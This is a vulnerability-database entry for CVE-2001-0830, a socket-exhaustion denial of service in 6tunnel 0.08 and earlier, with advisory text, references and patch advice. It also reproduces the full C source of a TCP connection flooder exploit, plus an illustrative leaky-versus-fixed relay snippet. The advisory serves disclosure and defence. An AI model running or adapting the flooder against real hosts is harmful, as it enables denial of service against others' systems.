CVE-2001-0830
CVSS 5.0
Published: 2001-12-06 00:00:00
Revised: 2016-10-17 22:12:05

[Original] 6tunnel 0.08 and earlier does not properly close sockets that were initiated by a client, which allows remote attackers to cause a denial of service (resource exhaustion) by repeatedly connecting to and disconnecting from the server.


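[CNNVD] 6Tunnel Connection Close State Denial of Service Vulnerability (CNNVD-200112-052)

        CVE(CAN) ID: CVE-2001-0830

        6Tunnel is a free, open source software package that provides an IPv6 tunnel for hosts that do not offer IPv6. A security problem has been found in the package that may allow a remote attacker to make the service unavailable to legitimate users.

        This is caused by the way the package manages sockets. When a client disconnects from the 6Tunnel server, the socket previously used by that client enters the "Close" state but never times out, so once a large number of connection requests are sent to the 6Tunnel server, the service crashes.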

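- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0830
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0830
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200112-052
(official data source) CNNVD

- Other links and resources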

ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
(UNKNOWN)  CONFIRM  ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
http://marc.info/?l=bugtraq&m=100386451702966&w=2
(UNKNOWN)  BUGTRAQ  20011023 Remote DoS in 6tunnel
http://www.securityfocus.com/bid/3467
(UNKNOWN)  BID  3467
http://xforce.iss.net/static/7337.php
(UNKNOWN)  XF  6tunnel-open-socket-dos(7337)

- Vulnerability information

6Tunnel Connection Close State Denial of Service Vulnerability
Medium severity, design error
2001-12-06 00:00:00 2005-11-29 00:00:00
Remote

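- Advisories and patches

        Temporary workaround:

        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:

        * We recommend restricting connection requests from external users to the service port at your firewall.

        Vendor patch:

        6Tunnel 0.09 has fixed this problem.

        Patch download address:

        ftp://213.146.38.146/pub/wojtekka/6tunnel-0.09.tar.gz
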

- Vulnerability information (21126)

6Tunnel 0.6/0.7/0.8 Connection Close State Denial of Service Vulnerability (EDBID:21126)
multiple dos
2001-10-23 Verified
0 awayzzz
N/A
source: http://www.securityfocus.com/bid/3467/info

6tunnel is a freely available, open source software package designed to provide IPv6 functionality to hosts that do not comply with the standard. It works by creating IPv6 tunnels.

A problem has been discovered in the software package that could allow remote users to deny service to legitimate users of the service. The problem is due to the management of sockets by the software package. When a client disconnects from the 6tunnel server, the socket previously used by the client enters the CLOSE state and does not time out. Once a large number of sockets is reached, the service crashes.

This makes it possible for a malicious user to deny service to legitimate users of the service. 

/* 
 * ipv4/ipv6 tcp connection flooder.
 * Originally used as a DoS for 6tunnel (versions < 0.08).
 * Version 0.08 is a broken version. Please update to 0.09.
 *
 * Description of options:
 * -6	:	flood an ipv6 address.
 * port :	tcp port to flood (default: 667)
 * delay:	delay between connections (passed to usleep(), so microseconds).
 * times:	max number of connections (default: 2500).
 *
 * awayzzz <awayzzz@digibel.org>
 * You can even find me @IRCnet if you need.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>		// close(), usleep()
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>		// inet_addr(), inet_pton()
#include <sys/socket.h>

#define DEFP	667		// default port.
#define DEFT	2500		// default number of connections.
#define TIME	100000	// delay between connections, in microseconds
                        	// (usleep() units; 100000 = 100 ms).

#define HAVE_IPV6

#define VALID_PORT(i)   (i<65535 && i > 0)

int main(int argc,char *argv[])
{

   int ret, fd, i, ip6 = 0;
   int times = DEFT, port = DEFP, delay = TIME;
   struct sockaddr_in sin;
  
#ifdef HAVE_IPV6
   struct sockaddr_in6 sin6;
#endif

   if( argc < 2 ) 
   {
       char *pname;

       if(!(pname = strrchr(argv[0],'/')))
          pname = argv[0];
       else
          pname++;

       printf("Usage: %s [-6] ip4/6 [port] [delay (us)] [times]\n", pname);
       exit (0);
   }

   if(!strcmp(argv[1],"-6"))
   {

#ifdef HAVE_IPV6
      ip6 = 1;
#endif
      argv++;
      argc--;
   }

   if(argc > 2)
   {
      port = strtol(argv[2], NULL, 10);
      if(!VALID_PORT(port))
      {
         fprintf(stderr,"Invalid port number. Using default\n");
         port = DEFP;
      }
   }

   if(argc > 3)
      delay = strtol(argv[3], NULL, 10);

   if(argc > 4)
      times = strtol(argv[4], NULL, 10);

   printf("Started with %s flood to %s on %d for %d times!\n",
         (ip6 == 1) ? "ipv6" : "ipv4", argv[1], port, times);
    
   for (i = 0; i < times; i++) 
   {
     
#ifdef HAVE_IPV6
      if(ip6)
      {
         fd = socket(AF_INET6, SOCK_STREAM, 0);
         memset(&sin6, 0, sizeof(sin6));

         sin6.sin6_family = AF_INET6;
         sin6.sin6_port = htons(port);
         inet_pton(AF_INET6,argv[1],sin6.sin6_addr.s6_addr);
      }
      else
      {
#endif /* HAVE_IPV6 */

         fd = socket(AF_INET, SOCK_STREAM, 0);
         memset(&sin, 0, sizeof(sin));

         sin.sin_family = AF_INET;
         sin.sin_addr.s_addr = inet_addr(argv[1]);
         sin.sin_port = htons(port);

#ifdef HAVE_IPV6
      }
      if(ip6)
         ret = connect(fd, (struct sockaddr *)&sin6, sizeof(sin6));
      else
#endif 
         ret = connect(fd, (struct sockaddr *)&sin, sizeof(sin));

      if(ret < 0)
      {
         printf("connect %d failed.\n",i);
         perror("connect");
         break;
      }
      
      printf("Connection no. %d\n",i);
      close(fd);
      usleep(delay);
   }
   return 0;
}
/* :wq */		
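
The server-side defect class described in this entry, as an added example (not 6tunnel's source and not part of the original entry): a relay handler that returns on client disconnect without calling close(), next to the corrected form. All function names and the socketpair-based session are constructed for illustration.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical relay step: copy client -> upstream until EOF; bytes or -1. */
static long pump(int client, int upstream)
{
    char buf[4096];
    long total = 0;
    ssize_t n;
    while ((n = read(client, buf, sizeof buf)) != 0) {
        if (n < 0) { if (errno == EINTR) continue; return -1; }
        for (ssize_t off = 0; off < n; ) {
            ssize_t w = write(upstream, buf + off, (size_t)(n - off));
            if (w < 0) { if (errno == EINTR) continue; return -1; }
            off += w;
        }
        total += n;
    }
    return total;
}

/* Defect class: returns on disconnect with both descriptors still open. */
long relay_leaky(int client, int upstream) { return pump(client, upstream); }

/* Corrected: both descriptors are released on every exit path. */
long relay_fixed(int client, int upstream)
{
    long r = pump(client, upstream);
    close(client); close(upstream);
    return r;
}

/* Constructed session: client sends 4 bytes, disconnects; 1 = fd leaked. */
int fd_left_open(long (*relay)(int, int))
{
    int c[2], u[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, c) != 0) return -1;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, u) != 0) return -1;
    if (write(c[1], "ping", 4) != 4) return -1;
    close(c[1]);                         /* client disconnects */
    long r = relay(c[0], u[0]);
    int still_open = (fcntl(c[0], F_GETFD) != -1);
    close(c[0]); close(u[0]); close(u[1]);   /* cleanup; EBADF is harmless */
    return r == 4 ? still_open : -1;
}

int main(void) { printf("leaky=%d fixed=%d\n", fd_left_open(relay_leaky), fd_left_open(relay_fixed)); return 0; }
```

With the leaky handler each finished session costs the server one descriptor per socket until the process limit is reached, which is the resource exhaustion the entry describes.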

- Vulnerability information

1977
6Tunnel Connection Close State Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- Vulnerability description

6Tunnel contains a flaw that may allow a remote denial of service. The issue is triggered by repeatedly connecting to and disconnecting from the server, and will result in loss of availability for the service.

- Timeline

2001-10-23 Unknown
2001-10-23 Unknown

- Solution

Upgrade to version 0.09 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete